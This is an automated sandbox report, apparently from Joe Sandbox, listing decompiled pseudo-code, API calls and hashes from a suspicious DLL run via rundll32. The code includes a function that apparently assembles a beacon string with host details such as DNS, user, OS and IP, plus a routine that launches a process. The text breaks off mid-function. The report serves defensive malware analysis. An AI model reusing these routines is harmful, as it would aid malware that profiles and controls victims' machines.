                                          • Instruction ID: e74e9f7747061cf73a1276fa2e6f27b545b8e0fb7ce43b18990fa83fbb0c9fbc
                                          • Opcode Fuzzy Hash: 61ef488e7445729efea19a69bd5507a4337dc18fc9ed6588bbcbad42fcd733da
                                          • Instruction Fuzzy Hash: 27018632100209FBDB22DF94DC05FAA3BAAFF04760F0C8019FA199E160E730A921D790
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 88%
                                          			E04FDA872(intOrPtr* __edi) {
                                          				intOrPtr _v8;
                                          				char _v12;
                                          				intOrPtr _v16;
                                          				intOrPtr _t15;
                                          				intOrPtr* _t21;
                                          
                                          				_t21 = __edi;
                                          				_push( &_v12);
                                          				_push(__edi);
                                          				_v8 = 0x1d4c0;
                                          				_t15 =  *((intOrPtr*)( *__edi + 0xe0))();
                                          				while(1) {
                                          					_v16 = _t15;
                                          					Sleep(0x1f4); // executed
                                          					if(_v12 == 4) {
                                          						break;
                                          					}
                                          					if(_v8 == 0) {
                                          						L4:
                                          						_t15 =  *((intOrPtr*)( *_t21 + 0xe0))(_t21,  &_v12);
                                          						continue;
                                          					} else {
                                          						if(_v8 <= 0x1f4) {
                                          							_v16 = 0x80004004;
                                          						} else {
                                          							_v8 = _v8 - 0x1f4;
                                          							goto L4;
                                          						}
                                          					}
                                          					L8:
                                          					return _v16;
                                          				}
                                          				goto L8;
                                          			}









                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: Sleep
                                          • String ID:
                                          • API String ID: 3472027048-0
                                          • Opcode ID: fc4149149ae0fc61b0f86c97429f9d0eedde91b4964533a8ed83f216fbc27266
                                          • Instruction ID: 8d288c336f815afd559cd0fee45c5dbde01d55b0c52679f1941a75984fa37f88
                                          • Opcode Fuzzy Hash: fc4149149ae0fc61b0f86c97429f9d0eedde91b4964533a8ed83f216fbc27266
                                          • Instruction Fuzzy Hash: A8F0E776D01218EFDB00DB94D588AEDB7B8EF05305F1484BAE902A7240E7B46B86DF59
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • lstrlenW.KERNEL32(04FD553C,?,?,04FDA818,3D04FDC0,80000002,04FD553C,04FD9642,74666F53,4D4C4B48,04FD9642,?,3D04FDC0,80000002,04FD553C,?), ref: 04FD1BE1
                                            • Part of subcall function 04FD6C68: SysAllocString.OLEAUT32(04FD9642), ref: 04FD6C81
                                            • Part of subcall function 04FD6C68: SysFreeString.OLEAUT32(00000000), ref: 04FD6CC2
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: String$AllocFreelstrlen
                                          • String ID:
                                          • API String ID: 3808004451-0
                                          • Opcode ID: dca11567b91903cad4de77cc7f21e2351f4029c8edf6243f7c1ebb647183dd96
                                          • Instruction ID: d4911a8850558721469da3df5b1728432d60ec74c5cc370c3baf89cd92025ed0
                                          • Opcode Fuzzy Hash: dca11567b91903cad4de77cc7f21e2351f4029c8edf6243f7c1ebb647183dd96
                                          • Instruction Fuzzy Hash: F8E0AE3200420EBFDF129F90EC46EAA3F6BEF08354F188115FA1458060D772A9B1EBA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E04FD60CF(void* __edx, void* __edi, void* _a4) {
                                          				int _t7;
                                          				int _t13;
                                          
                                          				_t7 = E04FD7A28(__edx, __edi, _a4,  &_a4); // executed
                                          				_t13 = _t7;
                                          				if(_t13 != 0) {
                                          					memcpy(__edi, _a4, _t13);
                                          					 *((char*)(__edi + _t13)) = 0;
                                          					E04FD147E(_a4);
                                          				}
                                          				return _t13;
                                          			}






                                          APIs
                                            • Part of subcall function 04FD7A28: memcpy.NTDLL(00000000,00000090,?,?,?,00000008), ref: 04FD7A5E
                                            • Part of subcall function 04FD7A28: memset.NTDLL ref: 04FD7AD3
                                            • Part of subcall function 04FD7A28: memset.NTDLL ref: 04FD7AE7
                                          • memcpy.NTDLL(?,?,00000000,?,?,?,?,?,04FD9F9F,?,?,04FD9C62,00000002,?,?,?), ref: 04FD60EB
                                            • Part of subcall function 04FD147E: HeapFree.KERNEL32(00000000,00000000,04FD1D11,00000000,?,?,-00000008), ref: 04FD148A
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: memcpymemset$FreeHeap
                                          • String ID:
                                          • API String ID: 3053036209-0
                                          • Opcode ID: f2b2b8ba8929acc20bdd7dadbc9947bfae244f1e76b9b7981e545fa298f64d36
                                          • Instruction ID: fb526b628cd957ca487e5e5f472ad126810454c2f4715b40005a2fcc09709a43
                                          • Opcode Fuzzy Hash: f2b2b8ba8929acc20bdd7dadbc9947bfae244f1e76b9b7981e545fa298f64d36
                                          • Instruction Fuzzy Hash: A4E0C277500129B7DB223E94DC00DEF7F5ECF566D1F084020FE089A215DA31EA11A3E2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          C-Code - Quality: 66%
                                          			E04FD514F(long __eax, void* __ecx, void* __edx, intOrPtr _a12, void* _a16, void* _a24, intOrPtr _a32) {
                                          				intOrPtr _v0;
                                          				intOrPtr _v4;
                                          				intOrPtr _v20;
                                          				intOrPtr _v28;
                                          				intOrPtr _v32;
                                          				void* _v48;
                                          				intOrPtr _v56;
                                          				void* __edi;
                                          				long _t26;
                                          				intOrPtr _t27;
                                          				intOrPtr _t28;
                                          				intOrPtr _t29;
                                          				intOrPtr _t30;
                                          				intOrPtr _t31;
                                          				void* _t34;
                                          				intOrPtr _t35;
                                          				int _t38;
                                          				intOrPtr _t43;
                                          				intOrPtr _t44;
                                          				intOrPtr _t51;
                                          				intOrPtr _t55;
                                          				intOrPtr* _t57;
                                          				intOrPtr _t63;
                                          				intOrPtr _t65;
                                          				intOrPtr _t71;
                                          				intOrPtr _t74;
                                          				intOrPtr _t77;
                                          				int _t80;
                                          				intOrPtr _t81;
                                          				int _t84;
                                          				intOrPtr _t86;
                                          				int _t89;
                                          				intOrPtr* _t92;
                                          				intOrPtr* _t93;
                                          				void* _t94;
                                          				void* _t98;
                                          				void* _t99;
                                          				void* _t100;
                                          				intOrPtr _t101;
                                          				void* _t103;
                                          				int _t104;
                                          				void* _t105;
                                          				void* _t106;
                                          				void* _t108;
                                          				void* _t109;
                                          				void* _t111;
                                          
                                          				_t98 = __edx;
                                          				_t94 = __ecx;
                                          				_t26 = __eax;
                                          				_t108 = _a16;
                                          				_v4 = 8;
                                          				if(__eax == 0) {
                                          					_t26 = GetTickCount();
                                          				}
                                          				_t27 =  *0x4fdd018; // 0x3df0b315
                                          				asm("bswap eax");
                                          				_t28 =  *0x4fdd014; // 0x3a87c8cd
                                          				asm("bswap eax");
                                          				_t29 =  *0x4fdd010; // 0xd8d2f808
                                          				asm("bswap eax");
                                          				_t30 =  *0x4fdd00c; // 0x8f8f86c2
                                          				asm("bswap eax");
                                          				_t31 =  *0x4fdd2a4; // 0x254a5a8
                                          				_t3 = _t31 + 0x4fde633; // 0x74666f73
                                          				_t104 = wsprintfA(_t108, _t3, 2, 0x3d137, _t30, _t29, _t28, _t27,  *0x4fdd02c,  *0x4fdd004, _t26);
                                          				_t34 = E04FD57AB();
                                          				_t35 =  *0x4fdd2a4; // 0x254a5a8
                                          				_t4 = _t35 + 0x4fde673; // 0x74707526
                                          				_t38 = wsprintfA(_t104 + _t108, _t4, _t34);
                                          				_t111 = _t109 + 0x38;
                                          				_t105 = _t104 + _t38;
                                          				_t99 = E04FD73E9(_t94);
                                          				if(_t99 != 0) {
                                          					_t86 =  *0x4fdd2a4; // 0x254a5a8
                                          					_t6 = _t86 + 0x4fde8cb; // 0x736e6426
                                          					_t89 = wsprintfA(_t105 + _t108, _t6, _t99);
                                          					_t111 = _t111 + 0xc;
                                          					_t105 = _t105 + _t89;
                                          					HeapFree( *0x4fdd238, 0, _t99);
                                          				}
                                          				_t100 = E04FD614A();
                                          				if(_t100 != 0) {
                                          					_t81 =  *0x4fdd2a4; // 0x254a5a8
                                          					_t8 = _t81 + 0x4fde8d3; // 0x6f687726
                                          					_t84 = wsprintfA(_t105 + _t108, _t8, _t100);
                                          					_t111 = _t111 + 0xc;
                                          					_t105 = _t105 + _t84;
                                          					HeapFree( *0x4fdd238, 0, _t100);
                                          				}
                                          				_t101 =  *0x4fdd324; // 0x75295b0
                                          				_a32 = E04FD757B(0x4fdd00a, _t101 + 4);
                                          				_t43 =  *0x4fdd2cc; // 0x0
                                          				if(_t43 != 0) {
                                          					_t77 =  *0x4fdd2a4; // 0x254a5a8
                                          					_t11 = _t77 + 0x4fde8ad; // 0x3d736f26
                                          					_t80 = wsprintfA(_t105 + _t108, _t11, _t43);
                                          					_t111 = _t111 + 0xc;
                                          					_t105 = _t105 + _t80;
                                          				}
                                          				_t44 =  *0x4fdd2c8; // 0x0
                                          				if(_t44 != 0) {
                                          					_t74 =  *0x4fdd2a4; // 0x254a5a8
                                          					_t13 = _t74 + 0x4fde8a6; // 0x3d706926
                                          					wsprintfA(_t105 + _t108, _t13, _t44);
                                          				}
                                          				if(_a32 != 0) {
                                          					_t103 = RtlAllocateHeap( *0x4fdd238, 0, 0x800);
                                          					if(_t103 != 0) {
                                          						E04FD749F(GetTickCount());
                                          						_t51 =  *0x4fdd324; // 0x75295b0
                                          						__imp__(_t51 + 0x40);
                                          						asm("lock xadd [eax], ecx");
                                          						_t55 =  *0x4fdd324; // 0x75295b0
                                          						__imp__(_t55 + 0x40);
                                          						_t57 =  *0x4fdd324; // 0x75295b0
                                          						_t106 = E04FD4D2C(1, _t98, _t108,  *_t57);
                                          						asm("lock xadd [eax], ecx");
                                          						if(_t106 != 0) {
                                          							StrTrimA(_t106, 0x4fdc294);
                                          							_t63 =  *0x4fdd2a4; // 0x254a5a8
                                          							_push(_t106);
                                          							_t15 = _t63 + 0x4fde252; // 0x616d692f
                                          							_t65 = E04FD9DEF(_t15);
                                          							_v20 = _t65;
                                          							if(_t65 != 0) {
                                          								_t92 = __imp__;
                                          								 *_t92(_t106, _v4);
                                          								 *_t92(_t103, _v0);
                                          								_t93 = __imp__;
                                          								 *_t93(_t103, _v32);
                                          								 *_t93(_t103, _t106);
                                          								_t71 = E04FD666E(0xffffffffffffffff, _t103, _v32, _v28);
                                          								_v56 = _t71;
                                          								if(_t71 != 0 && _t71 != 0x10d2) {
                                          									E04FD6106();
                                          								}
                                          								HeapFree( *0x4fdd238, 0, _v48);
                                          							}
                                          							HeapFree( *0x4fdd238, 0, _t106);
                                          						}
                                          						HeapFree( *0x4fdd238, 0, _t103);
                                          					}
                                          					HeapFree( *0x4fdd238, 0, _a24);
                                          				}
                                          				HeapFree( *0x4fdd238, 0, _t108);
                                          				return _a12;
                                          			}


















































                                          APIs
                                          • GetTickCount.KERNEL32 ref: 04FD5166
                                          • wsprintfA.USER32 ref: 04FD51B3
                                          • wsprintfA.USER32 ref: 04FD51D0
                                          • wsprintfA.USER32 ref: 04FD51F3
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04FD5203
                                          • wsprintfA.USER32 ref: 04FD5225
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04FD5235
                                          • wsprintfA.USER32 ref: 04FD526C
                                          • wsprintfA.USER32 ref: 04FD528C
                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04FD52A9
                                          • GetTickCount.KERNEL32 ref: 04FD52B9
                                          • RtlEnterCriticalSection.NTDLL(07529570), ref: 04FD52CD
                                          • RtlLeaveCriticalSection.NTDLL(07529570), ref: 04FD52EB
                                            • Part of subcall function 04FD4D2C: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,04FD52FE,?,075295B0), ref: 04FD4D57
                                            • Part of subcall function 04FD4D2C: lstrlen.KERNEL32(?,?,?,04FD52FE,?,075295B0), ref: 04FD4D5F
                                            • Part of subcall function 04FD4D2C: strcpy.NTDLL ref: 04FD4D76
                                            • Part of subcall function 04FD4D2C: lstrcat.KERNEL32(00000000,?), ref: 04FD4D81
                                            • Part of subcall function 04FD4D2C: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,04FD52FE,?,075295B0), ref: 04FD4D9E
                                          • StrTrimA.SHLWAPI(00000000,04FDC294,?,075295B0), ref: 04FD531D
                                            • Part of subcall function 04FD9DEF: lstrlen.KERNEL32(?,00000000,00000000,04FD5335,616D692F,00000000), ref: 04FD9DFB
                                            • Part of subcall function 04FD9DEF: lstrlen.KERNEL32(?), ref: 04FD9E03
                                            • Part of subcall function 04FD9DEF: lstrcpy.KERNEL32(00000000,?), ref: 04FD9E1A
                                            • Part of subcall function 04FD9DEF: lstrcat.KERNEL32(00000000,?), ref: 04FD9E25
                                          • lstrcpy.KERNEL32(00000000,?), ref: 04FD5348
                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 04FD534F
                                          • lstrcat.KERNEL32(00000000,?), ref: 04FD535C
                                          • lstrcat.KERNEL32(00000000,00000000), ref: 04FD5360
                                            • Part of subcall function 04FD666E: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,751881D0), ref: 04FD6720
                                          • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 04FD5390
                                          • HeapFree.KERNEL32(00000000,00000000,616D692F,00000000), ref: 04FD539F
                                          • HeapFree.KERNEL32(00000000,00000000,?,075295B0), ref: 04FD53AE
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04FD53C0
                                          • HeapFree.KERNEL32(00000000,?), ref: 04FD53CF
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeaveObjectSingleWaitstrcpy
                                          • String ID:
                                          • API String ID: 3080378247-0
                                          • Opcode ID: 1333ee4593f815bac282a55342f74bb6abe79436d52f9001c87906223bfb43cd
                                          • Instruction ID: 5d22c497faab0785b18a9bb843157d9d77142c99149baa20b839e654d142c648
                                          • Opcode Fuzzy Hash: 1333ee4593f815bac282a55342f74bb6abe79436d52f9001c87906223bfb43cd
                                          • Instruction Fuzzy Hash: 55619E72502209AFE711AFB4FC48E5A7BEFEB48745F090118F908DB250D729ED06DB64
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 51%
                                          			E04FDADA5(long _a4, long _a8) {
                                          				signed int _v8;
                                          				intOrPtr _v16;
                                          				LONG* _v28;
                                          				long _v40;
                                          				long _v44;
                                          				long _v48;
                                          				CHAR* _v52;
                                          				long _v56;
                                          				CHAR* _v60;
                                          				long _v64;
                                          				signed int* _v68;
                                          				char _v72;
                                          				signed int _t76;
                                          				signed int _t80;
                                          				signed int _t81;
                                          				intOrPtr* _t82;
                                          				intOrPtr* _t83;
                                          				intOrPtr* _t85;
                                          				intOrPtr* _t90;
                                          				intOrPtr* _t95;
                                          				intOrPtr* _t98;
                                          				void* _t102;
                                          				intOrPtr* _t104;
                                          				void* _t115;
                                          				long _t116;
                                          				void _t125;
                                          				void* _t131;
                                          				signed short _t133;
                                          				struct HINSTANCE__* _t138;
                                          				signed int* _t139;
                                          
                                          				_t139 = _a4;
                                          				_v28 = _t139[2] + 0x4fd0000;
                                          				_t115 = _t139[3] + 0x4fd0000;
                                          				_t131 = _t139[4] + 0x4fd0000;
                                          				_v8 = _t139[7];
                                          				_v60 = _t139[1] + 0x4fd0000;
                                          				_v16 = _t139[5] + 0x4fd0000;
                                          				_v64 = _a8;
                                          				_v72 = 0x24;
                                          				_v68 = _t139;
                                          				_v56 = 0;
                                          				asm("stosd");
                                          				_v48 = 0;
                                          				_v44 = 0;
                                          				_v40 = 0;
                                          				if(( *_t139 & 0x00000001) == 0) {
                                          					_a8 =  &_v72;
                                          					RaiseException(0xc06d0057, 0, 1,  &_a8);
                                          					return 0;
                                          				}
                                          				_t138 =  *_v28;
                                          				_t76 = _a8 - _t115 >> 2 << 2;
                                          				_t133 =  *(_t131 + _t76);
                                          				_a4 = _t76;
                                          				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
                                          				_v56 = _t80;
                                          				_t81 = _t133 + 0x4fd0002;
                                          				if(_t80 == 0) {
                                          					_t81 = _t133 & 0x0000ffff;
                                          				}
                                          				_v52 = _t81;
                                          				_t82 =  *0x4fdd1a0; // 0x0
                                          				_t116 = 0;
                                          				if(_t82 == 0) {
                                          					L6:
                                          					if(_t138 != 0) {
                                          						L18:
                                          						_t83 =  *0x4fdd1a0; // 0x0
                                          						_v48 = _t138;
                                          						if(_t83 != 0) {
                                          							_t116 =  *_t83(2,  &_v72);
                                          						}
                                          						if(_t116 != 0) {
                                          							L32:
                                          							 *_a8 = _t116;
                                          							L33:
                                          							_t85 =  *0x4fdd1a0; // 0x0
                                          							if(_t85 != 0) {
                                          								_v40 = _v40 & 0x00000000;
                                          								_v48 = _t138;
                                          								_v44 = _t116;
                                          								 *_t85(5,  &_v72);
                                          							}
                                          							return _t116;
                                          						} else {
                                          							if(_t139[5] == _t116 || _t139[7] == _t116) {
                                          								L27:
                                          								_t116 = GetProcAddress(_t138, _v52);
                                          								if(_t116 == 0) {
                                          									_v40 = GetLastError();
                                          									_t90 =  *0x4fdd19c; // 0x0
                                          									if(_t90 != 0) {
                                          										_t116 =  *_t90(4,  &_v72);
                                          									}
                                          									if(_t116 == 0) {
                                          										_a4 =  &_v72;
                                          										RaiseException(0xc06d007f, _t116, 1,  &_a4);
                                          										_t116 = _v44;
                                          									}
                                          								}
                                          								goto L32;
                                          							} else {
                                          								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
                                          								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
                                          									_t116 =  *(_a4 + _v16);
                                          									if(_t116 != 0) {
                                          										goto L32;
                                          									}
                                          								}
                                          								goto L27;
                                          							}
                                          						}
                                          					}
                                          					_t98 =  *0x4fdd1a0; // 0x0
                                          					if(_t98 == 0) {
                                          						L9:
                                          						_t138 = LoadLibraryA(_v60);
                                          						if(_t138 != 0) {
                                          							L13:
                                          							if(InterlockedExchange(_v28, _t138) == _t138) {
                                          								FreeLibrary(_t138);
                                          							} else {
                                          								if(_t139[6] != 0) {
                                          									_t102 = LocalAlloc(0x40, 8);
                                          									if(_t102 != 0) {
                                          										 *(_t102 + 4) = _t139;
                                          										_t125 =  *0x4fdd198; // 0x0
                                          										 *_t102 = _t125;
                                          										 *0x4fdd198 = _t102;
                                          									}
                                          								}
                                          							}
                                          							goto L18;
                                          						}
                                          						_v40 = GetLastError();
                                          						_t104 =  *0x4fdd19c; // 0x0
                                          						if(_t104 == 0) {
                                          							L12:
                                          							_a8 =  &_v72;
                                          							RaiseException(0xc06d007e, 0, 1,  &_a8);
                                          							return _v44;
                                          						}
                                          						_t138 =  *_t104(3,  &_v72);
                                          						if(_t138 != 0) {
                                          							goto L13;
                                          						}
                                          						goto L12;
                                          					}
                                          					_t138 =  *_t98(1,  &_v72);
                                          					if(_t138 != 0) {
                                          						goto L13;
                                          					}
                                          					goto L9;
                                          				}
                                          				_t116 =  *_t82(0,  &_v72);
                                          				if(_t116 != 0) {
                                          					goto L33;
                                          				}
                                          				goto L6;
                                          			}

                                          APIs
                                          • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 04FDAE1E
                                          • LoadLibraryA.KERNEL32(?), ref: 04FDAE9B
                                          • GetLastError.KERNEL32 ref: 04FDAEA7
                                          • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 04FDAEDA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: ExceptionRaise$ErrorLastLibraryLoad
                                          • String ID: $
                                          • API String ID: 948315288-3993045852
                                          • Opcode ID: c0bb653dea8c0cd8f137a92abafcb893ddb2991d92414a980db07410550398d8
                                          • Instruction ID: e930635f6a41b77e171c9a9508cfd1af9b5c5b943c69bf6e348ab9d7daceafc2
                                          • Opcode Fuzzy Hash: c0bb653dea8c0cd8f137a92abafcb893ddb2991d92414a980db07410550398d8
                                          • Instruction Fuzzy Hash: 02814DB1E01209AFDB15CFA9D884AADB7F6FF48314F188129E915E7340EB74E906CB54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 56%
                                          			E04FD30FC(void* __ecx, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                          				intOrPtr _v8;
                                          				intOrPtr _v12;
                                          				char _v16;
                                          				signed int _v20;
                                          				void* __esi;
                                          				intOrPtr _t42;
                                          				intOrPtr _t44;
                                          				void* _t46;
                                          				void* _t47;
                                          				void* _t48;
                                          				int _t49;
                                          				intOrPtr _t53;
                                          				WCHAR* _t56;
                                          				void* _t57;
                                          				int _t58;
                                          				intOrPtr _t64;
                                          				void* _t69;
                                          				intOrPtr* _t73;
                                          				void* _t74;
                                          				intOrPtr _t75;
                                          				intOrPtr _t79;
                                          				intOrPtr* _t85;
                                          				intOrPtr _t88;
                                          
                                          				_t74 = __ecx;
                                          				_t79 =  *0x4fdd33c; // 0x7529bb0
                                          				_v20 = 8;
                                          				_v16 = GetTickCount();
                                          				_t42 = E04FD9810(_t74,  &_v16);
                                          				_v12 = _t42;
                                          				if(_t42 == 0) {
                                          					_v12 = 0x4fdc19c;
                                          				}
                                          				_t44 = E04FD47E1(_t79);
                                          				_v8 = _t44;
                                          				if(_t44 != 0) {
                                          					_t85 = __imp__;
                                          					_t46 =  *_t85(_v12, _t69);
                                          					_t47 =  *_t85(_v8);
                                          					_t48 =  *_t85(_a4);
                                          					_t49 = lstrlenW(_a8);
                                          					_t53 = E04FD58BE(lstrlenW(0x4fdeb38) + _t48 + _t46 + _t46 + _t47 + _t49 + lstrlenW(0x4fdeb38) + _t48 + _t46 + _t46 + _t47 + _t49 + 2);
                                          					_v16 = _t53;
                                          					if(_t53 != 0) {
                                          						_t75 =  *0x4fdd2a4; // 0x254a5a8
                                          						_t73 =  *0x4fdd11c; // 0x4fdabc9
                                          						_t18 = _t75 + 0x4fdeb38; // 0x530025
                                          						 *_t73(_t53, _t18, _v12, _v12, _a4, _v8, _a8);
                                          						_t56 =  *_t85(_v8);
                                          						_a8 = _t56;
                                          						_t57 =  *_t85(_a4);
                                          						_t58 = lstrlenW(_a12);
                                          						_t88 = E04FD58BE(lstrlenW(0x4fdec58) + _a8 + _t57 + _t58 + lstrlenW(0x4fdec58) + _a8 + _t57 + _t58 + 2);
                                          						if(_t88 == 0) {
                                          							E04FD147E(_v16);
                                          						} else {
                                          							_t64 =  *0x4fdd2a4; // 0x254a5a8
                                          							_t31 = _t64 + 0x4fdec58; // 0x73006d
                                          							 *_t73(_t88, _t31, _a4, _v8, _a12);
                                          							 *_a16 = _v16;
                                          							_v20 = _v20 & 0x00000000;
                                          							 *_a20 = _t88;
                                          						}
                                          					}
                                          					E04FD147E(_v8);
                                          				}
                                          				return _v20;
                                          			}

                                          APIs
                                          • GetTickCount.KERNEL32 ref: 04FD3111
                                          • lstrlen.KERNEL32(00000000,80000002), ref: 04FD314C
                                          • lstrlen.KERNEL32(?), ref: 04FD3155
                                          • lstrlen.KERNEL32(00000000), ref: 04FD315C
                                          • lstrlenW.KERNEL32(80000002), ref: 04FD316A
                                          • lstrlenW.KERNEL32(04FDEB38), ref: 04FD3173
                                          • lstrlen.KERNEL32(?), ref: 04FD31B7
                                          • lstrlen.KERNEL32(?), ref: 04FD31BF
                                          • lstrlenW.KERNEL32(?), ref: 04FD31CA
                                          • lstrlenW.KERNEL32(04FDEC58), ref: 04FD31D3
                                            • Part of subcall function 04FD147E: HeapFree.KERNEL32(00000000,00000000,04FD1D11,00000000,?,?,-00000008), ref: 04FD148A
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrlen$CountFreeHeapTick
                                          • String ID:
                                          • API String ID: 2535036572-0
                                          • Opcode ID: 055bccae9be28fa4538cf063cfa76ac37eb53a9cfe8c773653247ffa94f0e408
                                          • Instruction ID: d8e6f1f88e228fd5a6d4ff6a354a8caf30cd28030f5751963ceeecb8d7917d3d
                                          • Opcode Fuzzy Hash: 055bccae9be28fa4538cf063cfa76ac37eb53a9cfe8c773653247ffa94f0e408
                                          • Instruction Fuzzy Hash: 65314C76D0020DEFDF11AFA4DC4489E7FB6EF48348B198065E904A7211DB35EA16DF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 73%
                                          			E04FD1493(void* __eax, void* __ecx) {
                                          				long _v8;
                                          				void* _v12;
                                          				void* _v16;
                                          				void* _v28;
                                          				long _v32;
                                          				void _v104;
                                          				char _v108;
                                          				long _t36;
                                          				intOrPtr _t39;
                                          				intOrPtr _t46;
                                          				intOrPtr _t49;
                                          				void* _t57;
                                          				void* _t66;
                                          				intOrPtr _t67;
                                          				intOrPtr* _t68;
                                          				intOrPtr* _t69;
                                          
                                          				_t1 = __eax + 0x14; // 0x74183966
                                          				_t67 =  *_t1;
                                          				_t36 = E04FD57D8(__ecx,  *(_t67 + 0xc),  &_v12,  &_v16);
                                          				_v8 = _t36;
                                          				if(_t36 != 0) {
                                          					L12:
                                          					return _v8;
                                          				}
                                          				memcpy(_v12,  *(_t67 + 8),  *(_t67 + 0xc));
                                          				_t39 = _v12(_v12);
                                          				_v8 = _t39;
                                          				if(_t39 == 0 && ( *0x4fdd260 & 0x00000001) != 0) {
                                          					_v32 = 0;
                                          					asm("stosd");
                                          					asm("stosd");
                                          					asm("stosd");
                                          					_v108 = 0;
                                          					memset( &_v104, 0, 0x40);
                                          					_t46 =  *0x4fdd2a4; // 0x254a5a8
                                          					_t18 = _t46 + 0x4fde3e6; // 0x73797325
                                          					_t66 = E04FD77E6(_t18);
                                          					if(_t66 == 0) {
                                          						_v8 = 8;
                                          					} else {
                                          						_t49 =  *0x4fdd2a4; // 0x254a5a8
                                          						_t19 = _t49 + 0x4fde747; // 0x7528cef
                                          						_t20 = _t49 + 0x4fde0af; // 0x4e52454b
                                          						_t69 = GetProcAddress(GetModuleHandleA(_t20), _t19);
                                          						if(_t69 == 0) {
                                          							_v8 = 0x7f;
                                          						} else {
                                          							_v108 = 0x44;
                                          							E04FD684E();
                                          							_t57 =  *_t69(0, _t66, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
                                          							_push(1);
                                          							E04FD684E();
                                          							if(_t57 == 0) {
                                          								_v8 = GetLastError();
                                          							} else {
